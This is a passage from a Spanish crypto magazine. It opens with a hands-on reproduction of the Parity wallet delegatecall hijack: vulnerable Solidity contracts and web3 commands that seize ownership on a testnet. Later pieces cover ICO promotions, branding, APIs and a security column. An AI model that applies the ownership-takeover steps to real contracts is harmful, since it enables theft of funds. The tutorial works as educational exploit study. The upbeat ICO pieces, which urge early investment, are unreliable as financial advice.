Observar que se hace un delegatecall a la dirección target, que es la dirección de la WalletLibrary. En concreto, se llama a la función initWallet. La función delegatecall lo que hace es delegar la ejecución de código a otro contrato pero sobre los datos (variables de estado) de quien llama [2]. Esta función de la librería (línea 216): function initWallet(address[] _owners, uint _required, uint _daylimit) { initDaylimit(_daylimit); initMultiowned(_owners, _required); } .... function initMultiowned(address[] _owners, uint _required) { m_numOwners = _owners.length + 1; m_owners[1] = uint(msg.sender); m_ownerIndex[uint(msg.sender)] = 1; for (uint i = 0; i < _owners.length; ++i) { m_owners[2 + i] = uint(_owners[i]); m_ownerIndex[uint(_owners[i])] = 2 + i; } m_required = _required; }
Se encarga de inicializar el nuevo wallet creado, asignando a los propietarios que recibe como parámetro. Hasta aquí no hay ningún problema, puesto que la función initWallet únicamente se ejecutaría cuando se inicializa el wallet. Sin embargo, el contrato wallet define la siguiente función (línea 424): function() payable { // just being sent some cash? if (msg.value > 0) Deposit(msg.sender, msg.value); else if (msg.data.length > 0) _walletLibrary.delegatecall(msg.data); }
27
Esta función anónima (sin nombre) es lo que se llama la función Fallback, que se ejecuta cuando se llama al contrato con una función que no reconoce o sin ningún dato (campo data vacío). Si la transacción que ejecuta el contrato tiene vinculados Ethers, los deposita. Sin embargo, si no se envían Ethers sino que se llama a alguna función, lo delega, como en la función constructora, a la librería wallet… Y aquí se encuentra el problema: _walletLibrary.delegatecall(msg.data);
Esta línea hace pública cualquier función de la librería, incluida la initWallet, haciendo posible que un atacante se haga propietario del wallet y sus fondos. Para entender mejor el problema, vamos a desplegar nuestros contratos y realizar el hackeo por nosotros mismos siguiendo la estrategia expuesta. Código vulnerable de ejemplo – WalletLibrary: pragma solidity ^0.4.19; contract WalletLibrary { address owner; function initWallet(address _owner) public { owner = _owner; } }
Código vulnerable de ejemplo – Wallet: pragma solidity ^0.4.19; contract Wallet { address public owner; address public walletLibrary; function Wallet(address _owner, address _walletLibrary) public { walletLibrary = _walletLibrary; bytes4 sig = bytes4(keccak256(“initWallet(address)”)); assembly { mstore(0x0, sig) mstore(0x4, _owner) delegatecall(sub(gas, 10000), _walletLibrary, 0x0, add(0x4,32), 0x0, 0x0) pop } } function () public payable { walletLibrary.delegatecall(msg.data); } }
Para probarlo, podéis utilizar Remix (https://remix.ethereum.org) y Metamask en la testnet de Ropsten, por ejemplo. Podéis solicitar Ether gratis en el faucet de Metamask: https://faucet.metamask.io.
28
Los pasos a seguir son: 1. Copiar el código de nuestra librería de ejemplo en Remix, compilar y crear el contrato:
Se nos abrirá la ventana emergente de MetaMask para confirmar la transacción:
29
Una vez minada, nos apuntamos la dirección asignada a nuestro contrato:
Para seguir con el ejemplo, mi dirección de contrato es: 0x92dda1ae37a6fc37a5460d2015df8e6085c598c7
2. Hacemos lo mismo para nuestro wallet de ejemplo, con la particularidad de que al crear el contrato le deberemos pasar la dirección del owner y la del contrato anterior:
En mi caso ha sido: “0x73EA48C582A25f221B7B57AD2D4404077B067742”,”0x92dda1ae37a6fc37a5460d2015df8e6085c598c7” Nos apuntamos también la dirección de este contrato: 0x941c7be004dc1d0c664262f5ac5c801f87c0d75d 3. Ahora que ya tenemos nuestros contratos desplegados, vamos a interaccionar con nuestro wallet para tomar el control. Es decir, modificar la variable owner a una dirección nuestra. Para eso, vamos a utilizar el objeto JavaScript web3 que nos proporciona MetaMask. Vamos a las developer tools de nuestro navegador, con MetaMask desbloqueado, y nos aseguramos de tener disponible el objeto:
30
Acto seguido, instanciamos nuestro objeto wallet para poder interaccionar con él: var abi = [ { “constant”: true, “inputs”: [], “name”: “walletLibrary”, “outputs”: [ { “name”: “”, “type”: “address” } ], “payable”: false, “stateMutability”: “view”, “type”: “function” }, { “constant”: true, “inputs”: [], “name”: “owner”, “outputs”: [ { “name”: “”, “type”: “address” } ], “payable”: false, “stateMutability”: “view”, “type”: “function” }, { “inputs”: [ { “name”: “_owner”, “type”: “address” }, { “name”: “_walletLibrary”, “type”: “address” } ], “payable”: false, “stateMutability”: “nonpayable”, “type”: “constructor” }, { “payable”: true, “stateMutability”: “payable”, “type”: “fallback” } ] var wallet = web3.eth.contract(abi) wallet = wallet.at(“0x941c7be004dc1d0c664262f5ac5c801f87c0d75d”)
Sustituir la última línea con la dirección de vuestro contrato wallet.
31
Ya podemos consultar el owner de nuestro wallet ejecutando: wallet.owner(function(err, value){console.log(value)})
Observamos que el owner es el que hemos pasado como argumento en la creación del contrato. Por último, lo que haremos, y es lo que hizo el atacante que aprovechó esta vulnerabilidad, es enviar una transacción al contrato wallet llamando a la función initWallet, que al no estar definida en el propio contrato, ejecutará la función fallback, que ejecutará, mediante delegatecall, la función initWallet de la librería y que cambiará el owner. El flujo a alto nivel que hará la transacción será: Transacción:
function_sign=web3.sha3(“initWallet(address)”).substr(2,8) web3.eth.sendTransaction({to: “0x941c7be004dc1d0c664262f5ac5c801f87c0d75d”, data: function_sign + “0000000000000000000000004cA590887287dB269BB6Ed5035154C0980465e32”}, function(){})
Modificar la dirección del to por la de vuestro contrato wallet. Metamask nos pedirá confirmación:
32
Podremos ver que la transacción se ha minado yendo a https://ropsten.etherscan.io y buscando por la dirección del contrato:
Medidas de seguridad Para evitar este tipo de vulnerabilidades, se debe tener mucho cuidado a la hora de desarrollar un smart contract. También se debe utilizar código auditado y revisado por cuantas más personas mejor. Frameworks como OpenZeppelin (y próximamente ZeppelinOS) son de mucha utilidad gracias a la estandarización de ciertos contratos y a la seguridad que aportan al estar probados y auditados. Es mejor no reinventar la rueda y apoyarse en este tipo de soluciones. Referencias 1. https://www.coindesk.com/30-million-ether-reported-stolen-parity-wallet-breach/ 2. http://solidity.readthedocs.io/en/develop/introduction-to-smart-contracts.html 3. https://blog.zeppelin.solutions/on-the-parity-wallet-multisig-hack-405a8c12e8f7
@albpalau DONACIONES BTC:
1K7mGpv268HFhkmJJ3buQrGXdzBr9DsZZy
ETH:
0xA1f25b006de398fD158141235CEc2F2f1eA072D2
33
LA BARR A LI BR E DEL
CRYP TOBAR
¿Qué es Cryptobar?
Una comunidad orientada al mundo de las criptomonedas, donde se busca compartir conocimientos, alertar de oportunidades y poder pasar un buen rato.
¿Cuál es el objetivo del token $BAR?
Tenemos tres objetivos claros y estos son: (i) incentivar el flujo de información entre los usuarios de la comunidad, (ii) buscar la excelencia de los grupos de Telegram filtrando la información de valor que se está aportando y (iii) otorgar el poder a la comunidad, buscando que los integrantes cedan conocimientos e información en beneficio de la comunidad.
¿Comó funciona el token $BAR?
Los usuarios van a poder valorar las aportaciones de los demás integrantes y, a final del mes, el sistema calculará aquellos usuarios que más aportaciones de valor han realizado y mediante una clasificación vamos a premiar con una cantidad destinada ya a cada mes y un porcentaje a los usuarios. También, para incentivar el grupo y mantener a los usuarios activos, vamos a realizar dos concursos al trimestre: uno de ellos será un concurso de trading y otro será un concurso por equipos, con unas recompensas ya establecidas para cada uno de ellos. Evidentemente, para poder participar en estos concursos, los usuarios deberán ser poseedores del token BAR.
34
¿Cuáles son los hitos del roadmap?
Se ha dividido el proyecto en tres grandes hitos. El primero y el más importante lo hemos nombrado como “los básicos”, ya que pretende el desarrollo del bot de recompensas a partir del cual le damos idea y valor a la comunidad, valorando y recompensando la información y señales que se comparten en el grupo. El segundo hito lo hemos llamado “ocio en la seriedad”, y mediante juegos, sorteos, torneos, el proyecto “Cryptobar lotería”, en fin, una serie de aplicaciones donde queremos que el token BAR sea el centro de todo, dándole utilidad y justificando su valor. Por último, el tercer hito y el más ambicioso es “la creación del Cryptobar físico”, donde pretendemos trasladar la idea, la filosofía del grupo de Telegram a un espacio físico, donde los integrantes de la comunidad puedan intercambiar impresiones, ideas, señales, formaciones de trading, convenciones y se puedan conectar a la red para operar.
¿Comó va a ser la ICO?
La ICO tendrá una duración de un mes, del 15 de enero al 15 de febrero. En ella se podrán adquirir hasta 70 millones de tokens y se aceptarán únicamente transacciones en ETH. También se ha realizado un airdrop que hemos abierto durante dos meses con el objetivo de hacer partícipes al máximo número de usuarios posibles.
¿En qué exchanges va a ser listada?
Por el momento tenemos asegurado ser listados en dos exchanges (Lescovex y Etherdelta) y estamos trabajando para aparecer en otros tres.
¿Por qué debería un usuario invertir en Cryptobar?
Nosotros vamos a poner los mecanismos, la herramienta, pero nuestra meta es crecer con el usuario, hacerle partícipe, que adquiera valor y sea consciente él/ella y la comunidad del poder que unidos tienen, buscando obtener entre todos grandes beneficios mientras nos divertimos.
Jordi
Adri
Hilde
Guzman
Daniel
Nano
Luis
Yisus
Whitezero
Troyu
35
36
BLO C KB RA N DS Sergio García Gómez
E l va l o r de la ma rca e n la s cr i pto m o n e da s ¿Qué puede aportar el branding en los proyectos de blockchain?
La afloración constante de nuevos proyectos basados en blockchain y la consecuente necesidad de posicionarse dentro del ecosistema blockchain suponen un hito más que relevante para el territorio de las marcas. ¿En qué puede ayudar el branding a las criptomonedas? Una de las respuestas posibles es ayudar a dotarlas del poder para mostrar lo que realmente son, mostrar su esencia. Porque al final no son ellas las que se definen, sino las personas que interactúan con ellas, y hablan de ellas. Un universo formado por wallets, exchanges, ICOs, eventos y plataformas consolidadas que interactúan en un sector todavía por desarrollar, y en muchos casos sin regularizar. Sus órbitas transcurren con la relatividad de su tiempo, la inmediatez. Como si de una carrera espacial se tratara, los equipos tratan de crear el whitepaper más efectivo, cumplir con
los plazos establecidos del roadmap o conseguir las mejores alianzas del mercado. Sin duda alguna, la batalla está servida en el Internet del valor. Y es que en la era de la inmediatez, la imagen y la síntesis de los mensajes son parte fundamental para llegar a los stakeholders (públicos de interés). Por esto mismo, tratan de dar coherencia a sus puntos de contacto, en algunos casos mejor que en otros, pero sobre todo apostando por la conexión con los usuarios a través de las redes sociales, el verdadero terreno de juego. Telegram, Slack, Twitter, Reddit, Bitcointalk, Medium y un largo etcétera son los lugares donde se encuentran los públicos, y posiblemente ahí es donde reside el verdadero punto clave para mostrar el porqué del proyecto y cómo la marca es capaz de expresarlo.
37
Pero vayamos con algunos ejemplos prácticos, que ya parecen de otro siglo, ya que, como decía, el tiempo en el panorama blockchain es diferente al resto, todo sucede mucho más rápido. Ya casi no nos acordamos de Antshares, el Ethereum chino. Se trataba del proyecto de código abierto y original del país asiático. Con su plataforma de activos inteligentes, formada con una combinación de smart contracts y activos digitales, poseía un token con un valor alrededor de los 9,60 $ en junio de 2017. La pequeña hormiga atómica de color azul parece ser que no se alineaba con los propósitos de la compañía, sobre todo al competir con la sobriedad y seriedad de su principal rival: Ethereum. Por ello, implantaron un completo rebranding (cambio de marca o rediseño de identidad) que comenzó desde el propio naming (creación del nombre). NEO fue el elegido, y por extensión esto afectó a toda su identidad. Un giro hacia la internacionalización a favor de la seguridad y la confianza para poder captar mejor a su público objetivo. Es aquí donde la compañía china nos da un claro ejemplo de que algo, aunque funcione, si no cuenta o aporta lo que queremos ser, es mejor cambiar y apostar por lo que realmente queremos llegar a ser. Ahora mismo NEO ocupa la posición 12 en Coinmarketcap, con un valor de 101,35 $. Seis meses en los que no solo la marca ha sido la protagonista de este crecimiento, sino todo lo que rodea el proyecto, desde su roadmap hasta los nuevos lanzamientos de su plataforma. ¿En qué posición estaría si no se hubiera arriesgado a cambiar Antshares? Otro caso, más reciente y diferente, es el de Waves. La plataforma de trading y crowdfunding descentralizada de origen ruso ha optado por optimizar y sintetizar toda su identidad. Algo que ha pulido de una manera magistral, llevándolo a lo que realmente es importante y que constituye su valor diferencial: la usabilidad de su plataforma. Un desarrollo, en fase beta, que muestra desde el primer contacto una exquisitez por acercar la tecnología blockchain a las personas, como bien dice su claim: “Blockchain for the people”. Es tal su gran acierto, que muchos ya no recordamos la imagen anterior, no hacen falta unas olas en un símbolo, para que el logotipo de Waves nos sugiera la fluidez y transparencia del agua en movimiento. ¿Era necesario un cambio? ¿Una evolución? Pues parece ser que sí. Es fundamental si el proyecto está madurando, quieres dotar de nuevas sensaciones al usuario y ser relevante para él. Waves era ya un proyecto interesante y con una filosofía que lo ha ido posicionando en un entorno más competitivo. Ahora no todo está hecho, y tendrá que marcarse nuevos objetivos y retos, pero sin duda está demostrando profesionalidad en todo lo que hace, y no solo en la parte estética. Aquí se muestra un trabajo estratégico que parte del interior de la compañía hacia el exterior.
38
En los próximos meses otra criptomoneda está preparándose para el cambio. Se trata de Lisk, que tras su inicio prometedor todavía necesita implementar sus cualidades. El proyecto es interesante y aporta servicios que deben ser explicados de una forma más coherente con su marca, por ello confiemos en que sepa aplicar este rebranding de la mejor forma posible. ¿Le funcionará tan bien como a los anteriores proyectos? ¿Sabrán captar la verdadera esencia del proyecto? ¿Podrán ser capaces de acercar su comunicación a un público cada vez más saturado de información? Sin duda, estamos inmersos en momentos de cambio, y es emocionante ver cómo van interactuando estos nuevos proyectos, estas nuevas marcas. Al tratarse de tecnologías que se centran en las personas, hay que situar a los usuarios en el centro de este universo. Hacerlo fácil, accesible y confiable serán algunos de los vectores más importantes, así cada vez se irá conectando la tecnología de estos sectores actualizados con la sociedad actual y futura.
@esepuntoge DONACIONES BTC:
1HeVqRrqLHohMPEwLnXbCetJQ1HvXnVDPq
LT C :
LKRgxEoHVLjMLngrrpR7LDLm187LwEP7Ev
ETH:
0x477ea30CaD23faeB05B9D50d1A8D2b29De790a81
39
CONVERSANDO CON
CRIPTOCOMPARADOR.COM Mike Navarro
Como todos sabemos, corren tiempos de cambio, y es en estos momentos donde lo que realmente tiene valor es la información. Y no solo la cantidad de información, sino la calidad de la misma. Se podría decir que estamos desbordados. Necesitamos filtrar, ordenar y contrastar, en la medida de lo posible, de forma rápida y eficiente. Precisamente por eso nace Criptocomparador, como solución a una necesidad real: encontrar una herramienta que facilite información sobre las distintas criptomonedas del mercado de forma rápida y organizada, sin la necesidad de estar perdido por la red, donde, además, la cantidad de información de valor en habla hispana resulta aún escasa.
En esta primera versión del proyecto nos hemos centrado en obtener los datos más generalistas, como, por ejemplo, el valor de capitalización en el mercado, el incremento y decremento de precio en el tiempo o la cantidad de monedas en circulación. Estos datos constituyen parte de la prueba de concepto, ya que el objetivo final es generar un comparador que facilite información de valor para los diferentes “perfiles” de usuario que existen en este apasionante mundo, como pueden ser un inversor, un “minero”, un investigador, un desarrollador, etc. Actualmente, los datos de diferente naturaleza se encuentran tan dispersos y en tantas plataformas que nos dificulta el trabajo de búsqueda. Mantenernos al día conlleva tiempo y además es complicado, pero Criptocomparador quiere cambiar eso.
“Conseguir una herramienta que nos permita comparar las diferentes criptomonedas del mercado es nuestro principal objetivo” 40
Con Criptocomparador, los usuarios tendrán la posibilidad de configurar su propio dashboard, donde se mostrarán únicamente los datos y monedas que ellos decidan. Por ejemplo, hace unos días hemos añadido dos nuevos datos de interés para las personas que se dedican al minado de criptomonedas, como son el algoritmo y el tipo de “prueba” que utiliza cada moneda, y ya tenemos un listado de nuevos datos que van solicitando los usuarios. ¡Queda mucho por hacer! Aunque parezca contrario a la filosofía de la descentralización de blockchain, a veces es importante tener un centro de información que nos ayude a tomar las mejores decisiones en el menor tiempo posible. Detrás de Criptocomparador se esconden muchas posibilidades que poco a poco irán floreciendo para contribuir a este gran ecosistema y a esta gran comunidad, donde colocamos nuestro granito de arena desde el corazón de Mallorca. Estamos creciendo, y tenemos las puertas abiertas para todo aquel que desee colaborar, desde cualquier parte del mundo. Ya somos unos cuantos y no paramos de crecer. ¡Uníos al cambio!
@criptocomparado DONACIONES LT C :
Lafo8vYnRpog311XPmNy4LcS63s7u7worb
ETH:
0xDb09f6ea7043015a2C9443B91b11Bc2d337013B1
DASH:
XrgogBMcua9rkdDtieM3GS5AhWnovuVsJs
41
APIs y c r ip t o m o n e da s Agustín Esteve
Cualquier web de criptomonedas que se precie deb ería disp oner de una API, p ero… ¿Qué es una API y qué es lo que ap orta? Una API (Application Programming Interface) es el mecanismo más útil para conectar dos softwares entre sí para el intercambio de mensajes o datos en formato estándar como XML o JSON. Es decir, es una forma de abrir los datos o funciones de nuestra plataforma para que cualquier programador use los mismos o amplíe su funcionalidad, convirtiéndose en la mejor forma de obtener publicidad, al aparecer nuestros datos en otros sitios u obtener nuevas vías de búsqueda de ingresos abriéndose al talento externo, entre otros. Normalmente se puede encontrar la documentación de la API en la web para desarrolladores de cada uno de los proyectos.
42
Los bancos, como por ejemplo el BBVA (https://www.bbvaapimarket. com), con la amenaza de las fintech, han comprendido rápidamente la necesidad que tienen de crear APIs, pues es una forma de ofertar datos. Un ejemplo sería ofrecer la información de sus productos a comparadores para que directamente se contraten desde allí los productos del banco, o acceder a un crédito rápido desde una web de venta de productos online… Ya en el año 2012, Gartner recomendaba a los bancos invertir en APIs: https://www.gartner.com/newsroom/id/2217415. Pero, ¿qué es lo que puede hacerse con una API de criptomonedas? · Una web o app podría aceptar pagos en criptomonedas, siendo esta la funcionalidad más obvia. Esta funcionalidad ya se puede realizar con APIs de Blockchain.info (https://api.blockchain.info/customer/ signup) o Coinbase (https://developers.coinbase.com). · Los principales exchanges disponen de APIs. Por ejemplo, esta es la web para desarrolladores de Coinbase: https://developers.coinbase.com. Desde ella, se ve que es relativamente sencillo desarrollar trading automático con su servicio GDAX, así como en otras como Bittrex, que también ofrece sus cotizaciones y posibilita operar desde las APIs (https://bittrex.com/home/api). Prácticamente todos los exchanges ofrecen API, pues de lo contrario corren el riesgo de que sus cotizaciones no sean listadas por terceros, perdiendo visibilidad y volumen de negocio. · Otras webs, como Coinmarketcap (https://coinmarketcap.com/api), también disponen de su API, que agrega las cotizaciones de varios exchanges y los ofrece en una nueva API (esta es, por ejemplo, la que yo uso en el chatbot de Telegram para ofrecer las cotizaciones: @solutioon_bot). Una API no solo debe servir para cobrar por su uso (aunque hay empresas que basan su modelo de negocio en el desarrollo de APIs para su uso de datos y funciones por terceros, como https://bravenewcoin. com), con su utilización por terceros desarrolladores se aprende y se descubren oportunidades. ¿Llegaremos algún día con el desarrollo del Internet de las cosas a conseguir que se integren desde muchos dispositivos las APIs de las cryptowallets y que acercando el móvil nos cobre la máquina de vending desde nuestro wallet o que cuando en un coche se encienda el piloto de avería, el wallet ya nos avise que debemos acomodar nuestro presupuesto familiar para hacer frente a esa reparación, puesto que nuestro taller ya nos cobrará en criptomonedas? ¿Qué nuevo servicio o desarrollo está pasando por tu mente haciendo uso de las APIs de terceros?
@solutioon DONACIONES ETH:
0xdcd7920ed6800703c54d1ba32a92676cb8bcc008
BTC:
LMPuVcfyqvKfMPaV6VqyMuHSffp6myJtE8
43
L E YEND O WH I TEPAPERS… Miguel Sánchez
Con motivo de la inauguración de esta sección, comenzamos con uno de los proyectos más atractivos de este primer trimestre de 2018, combinando por primera vez en territorio español la tecnología blockchain de Ethereum con la compraventa de energía proveniente únicamente de fuentes renovables. Hablamos de WePower, una nueva plataforma que quiere revolucionar el consumo de electricidad tal y como lo conocemos, conectando a particulares, inversores y creadores de mercado directamente con los proveedores de energía renovable y creando una red de compraventa de tokens global. Una vez formen parte de la plataforma, estos proveedores podrán utilizarlos al mismo tiempo como herramienta de financiación, ya que la energía que se haya de producir en el futuro se tokenizará y se marcará a un precio de 1 kW/h, facilitando el acceso a capital para posibles ampliaciones o mejora de la infraestructura de sus negocios. De esta forma, aprovecha el mal momento que sufre el sector de las renovables debido a la caída en las subvenciones estatales y el aumento de las barreras de acceso al crédito bancario en torno a proyectos de esta índole. Antes de seguir, comenzaremos a describir las características del token WPR y de la ICO, donde se podrá invertir previo registro en la whitelist del sitio web de la empresa.
44
Nombre
WPR (ERC-20).
Distribución de los tokens
Origen
Estonia (sede en Gibraltar).
55 % para la ICO, 20 % para el Team, 15 % para desarrollo de comunidad.
Plataforma/Blockchain
Áreas restringidas
Preventa
Vesting de los tokens del team
Ethereum.
Finalizada, 3.000.000 $ recaudados. Fecha y duración de ICO
Del 1 al 14 de febrero. Tokens a la venta:
Número de tokens legitimado al tipo de cambio. Valor del token
Determinado por el tipo de cambio flotante frente a Ethereum, actualmente 1 ETH/4000 PWR.
EE UU.
Bloqueo de los tokens del equipo por un período de 3 a 4 años a partir de la finalización de la ICO. Bonus
Programa de afiliación para inversores preseleccionados. Tokens no vendidos
Quema de tokens. Cap. individual ICO / anti-whaling
No existe una cantidad límite de contribución.
SoftCap y HardCap
5.000.000 $ y 35.000.000 $ respectivamente.
Sitio web
https://wepower.network. Whitepaper
https://drive.google.com/file/d/0B_OW_EddXO5RWWFVQjJGZXpQT3c/view. Telegram
https://t.me/WePowerNetwork. Twitter
https://twitter.com/WePowerN. Review de ICO Rating
https://icorating.com/analytics/indepth/wepower-rating-review. 45
Estamos ante un proyecto con un gran potencial y donde la escalabilidad puede resultar ser una tarea más sencilla y prometedora. La plataforma WePower lleva activa desde su lanzamiento en agosto y cualquier persona puede probarla desde su sitio web una vez instalado el software de Metamask. Se trata de un MVP con una gran proyección en el futuro, con una visión pionera del mercado energético, ya que la estandarización de la energía en forma de tokens es algo completamente novedoso en el sector, si bien es cierto que otras start-ups como Power Ledger y Pylon Network comparten bastantes puntos en común, pese a tener visiones y objetivos distintos. Además, WePower actuará en sí mismo como un proveedor de energía independiente dentro de la red eléctrica, anotando con la ayuda de smart contracts informes automáticos de la energía producida, consumida y del precio de la energía de la red. El equipo cuenta con una gran experiencia en el sector energético, partiendo desde su CEO, Nikolaj Martyniuk, hasta el grupo de ingenieros que lo conforman. También se encuentran entre sus filas antiguos desarrolladores de Skype. Podemos observar que la selección de socios ha sido muy exitosa hasta el momento. Por ejemplo, el acuerdo para comenzar el proyecto piloto y tokenizar parte de la energía producida en Estonia con la empresa Elering, uno de los mayores operadores/proveedores energéticos del país, ha permitido empezar con buen pie a la compañía. Se suman a la lista de socios otras caras conocidas como Bancor, CreditSuisse y Stockholm Green Digital Finance. Entre los socios españoles sobre todo destacamos a Conquista Solar. Llama enormemente la atención la carta del ministro de Energía de Lituania dando el beneplácito a la compañía por su aporte en la carrera hacia un futuro de energías limpias, para rematar todo lo anterior.
46
Analizando el whitepaper, encontramos otra clara señal de que se trata de un proyecto con unas perspectivas claras y bien definidas. Si contemplamos los objetivos a medio y largo plazo de la empresa, se puede percibir que una vez finalizada la ICO el equipo se va a volcar en mejorar infraestructuras con el objetivo de tener todo listo de cara a la primera fecha clave, marcada en su roadmap para el mes de noviembre de 2018, cuando la plataforma esté operativa en territorio español. Damos por descontado la etapa del mes de abril, ya que el contrato con la empresa Elering ya se ha realizado, generando más buenas noticias para su comunidad.
47
Finalizamos este primer análisis comentando la inmejorable opinión que el sitio web ICO Ratings (categoría A de sitios web de calificación) ha otorgado a esta firma y en cuyo primer párrafo se puede leer: “Asignamos a We Power una calificación positiva y recomendamos la participación en la ICO inmediatamente después del comienzo de la venta de tokens y antes de lograr el SoftCap de 5.000.000 $ para conseguir el mejor descuento”. Parece que todos estos factores están otorgando al proyecto una gran credibilidad, que puede verse reflejada en la repercusión que está teniendo en la comunidad. Mientras se escriben estas líneas, existen 16.000 personas suscritas a su canal de Telegram y 11.600 seguidores en Twitter. Animamos a leer el whitepaper del proyecto para un mejor conocimiento y entendimiento de lo que pensamos que será una gran oportunidad de inversión a medio y largo plazo.
@Mikephicc DONACIONES BTC:
1AUCeQwHtKUyvprWJ8F1cmXcQTPGvurz6G
ETH:
0xA33894b86e1c607Ad8982D0C9Ef30fA79d968901
LT C :
La4vv7zTCDCdqKSRr8BEEPKvbgq5CkHRz2
48
49
SEGUR I DAD EN D O CE PAL ABR AS Bitnos
Hoy vamos a desviarnos del guión que teníamos pensado para hacer referencia a tres vulnerabilidades graves que, en medio de estas Navidades, nos han hecho saltar del sofá a más de uno: los fallos encontrados en prácticamente todos los procesadores del mercado (bautizados como “Meltdown” y “Spectre”), así como la vulnerabilidad encontrada en la wallet Electrum. La información que podéis encontrar por la red al respecto de estos fallos y sus parches estará mucho más completa y actualizada de lo que pretendemos abordar aquí, pero, resumiendo al máximo, el fallo de Electrum permitía a cualquier web robar nuestro archivo wallet.dat (en el que están nuestras claves privadas) si teníamos Electrum abierto, y ya ha sido corregido mediante actualización. Por otro lado, los fallos de los procesadores no tienen solución definitiva que no sea cambiar los chips (cuando saquen unos sin el fallo), pero se puede mitigar el riesgo mediante actualizaciones de software que están saliendo en estos días. Eso sí, aquellos que utilicen dispositivos Android de esos que no reciben actualizaciones nunca, tienen una razón más para no hacer con ellos nada que requiera la más mínima confidencialidad, porque Meltdown y Spectre no son ninguna broma: permiten que un atacante lea en tiempo real todo lo que pasa por la memoria de nuestra máquina, incluidas nuestras contraseñas y claves privadas. Estos fallos de seguridad en el software o en el hardware no son los primeros ni serán los últimos, y nos deben hacer reflexionar sobre la enorme responsa-
bilidad que asumimos al decidir prescindir de los bancos para pasar a gestionar por nosotros mismos la seguridad de nuestro dinero. Yendo al grano: si hemos decidido pasarnos a este fascinante mundo de las criptos, debemos hacer un esfuerzo por mantener lo más sanas y a salvo que podamos nuestras máquinas y nuestras redes. Lo de las máquinas está más o menos claro: ordenadores cifrados, siempre actualizados, utilizar solo software confiable, protegernos con antivirus y cortafuegos… Esas cosas. Pero, ¿y lo de las redes? El caso es que lo que tienen en común las tres vulnerabilidades a las que hemos hecho referencia es que son explotables a través de unas pocas líneas de código JavaScript, que bien puede insertar alguien en una página web, o bien puede ser inyectada directamente desde nuestra red local. ¿Cómo? ¿Entonces no es suficiente con no hacer clic en el enlace a www.haztemillonarioen3dias.com? Pues no. Cualquier persona con acceso a nuestra red local (cualquiera que tenga la clave de la wifi, vamos) puede inyectar código en las páginas, en principio confiables, por las que estamos navegando. No nos queda espacio más que para recordaros que el router es quizás la máquina más insegura y más importante que tenéis en casa, y dejaros un link en el que poder profundizar: https://es.gizmodo.com/como-mantener-la-red-wifi-de-tu-casa-a-salvo-de-hackers-1821221831
50
SPE CTR E EL E CTR UM P ROCE SA DOR R E DE S R OUTE R WA L L E T KE Y WPA 2 JAVA SCR I PT BR OWSE R M I TM
51
52
C OLAB OR A
Agorachain es un sistema abierto a colaboraciones y uniones para mejorar el ecosistema blockchain. Ayúdanos a crear una plaza pública y únete con tus ideas para replantear el futuro.
@AgoraChain DONACIONES BTC:
36maXkceCQvE8J8vJ9iCMb4u7PZoyGGikY
LT C :
MUJrrUuiH9VKaah5KPqRoNeQF2765DTbDK
ETH:
0x7416b50240871279adae044f5c0b531e868a0da3
53
Naturaleza /
En el entorno del รกgora confluyen diversos seres vivos. Conocerlos es un privilegio, no olvides de dรณnde venimos, y a dรณnde vamos...
agorachain.org